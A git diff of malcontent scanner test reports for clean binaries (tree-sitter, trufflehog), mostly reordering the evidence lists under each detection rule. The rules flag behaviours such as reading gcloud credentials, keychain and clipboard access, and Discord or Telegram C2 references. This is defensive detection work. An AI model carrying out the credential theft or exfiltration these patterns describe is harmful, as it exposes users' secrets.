[HOME](https://github.com/search?q=HOME&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | @@ -29,7 +29,7 @@ | LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | | LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | @@ -41,7 +41,7 @@ | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h) | | LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | | LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index 547b61558..fe0fec00f 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -3,51 +3,51 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.s3](https://%s.s3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s/account.json](https://%s/account.json)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%sSCRAM](https://%sSCRAM) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[announce_port](https://github.com/search?q=announce_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/account.json](https://%s/account.json)
[https://%sSCRAM](https://%sSCRAM)
[https://%s.s3](https://%s.s3) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [announce_port](https://github.com/search?q=announce_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) | -| MEDIUM | [c2/addr/telegram](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/telegram.yara#telegram) | telegram | [Telegram](https://github.com/search?q=Telegram&type=code)
[telegram.org](https://github.com/search?q=telegram.org&type=code) | -| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code)
[clientId](https://github.com/search?q=clientId&type=code)
[client_id](https://github.com/search?q=client_id&type=code) | +| MEDIUM | [c2/addr/telegram](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/telegram.yara#telegram) | telegram | [telegram.org](https://github.com/search?q=telegram.org&type=code)
[Telegram](https://github.com/search?q=Telegram&type=code) | +| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientID](https://github.com/search?q=clientID&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#download_ref) | downloads files | [download file](https://github.com/search?q=download+file&type=code) | -| MEDIUM | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) | +| MEDIUM | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | | MEDIUM | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#shodan_io) | References shodan.io | [shodan.io](https://github.com/search?q=shodan.io&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | -| MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code) | +| MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code)
[UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | | MEDIUM | [collect/databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | | MEDIUM | [credential/clipboard](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/clipboard.yara#nspasteboard) | [access clipboard contents](https://www.sentinelone.com/blog/session-cookies-keychains-ssh-keys-and-more-7-kinds-of-data-malware-steals-from-macos-users/) | [atotto/clipboard](https://github.com/search?q=atotto%2Fclipboard&type=code) | -| MEDIUM | [credential/cloud/g](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/cloud/gcloud.yara#gcloud_config_value) | Access gcloud configuration files | [.config/gcloud](https://github.com/search?q=.config%2Fgcloud&type=code)
[application_default_credentials.json](https://github.com/search?q=application_default_credentials.json&type=code) | +| MEDIUM | [credential/cloud/g](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/cloud/gcloud.yara#gcloud_config_value) | Access gcloud configuration files | [application_default_credentials.json](https://github.com/search?q=application_default_credentials.json&type=code)
[.config/gcloud](https://github.com/search?q=.config%2Fgcloud&type=code) | | MEDIUM | [credential/gaming/minecraft](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/gaming/minecraft.yara#minecraft) | Has references to Minecraft | [minecraft](https://github.com/search?q=minecraft&type=code) | | MEDIUM | [credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain) | accesses a keychain | [Keychain](https://github.com/search?q=Keychain&type=code)
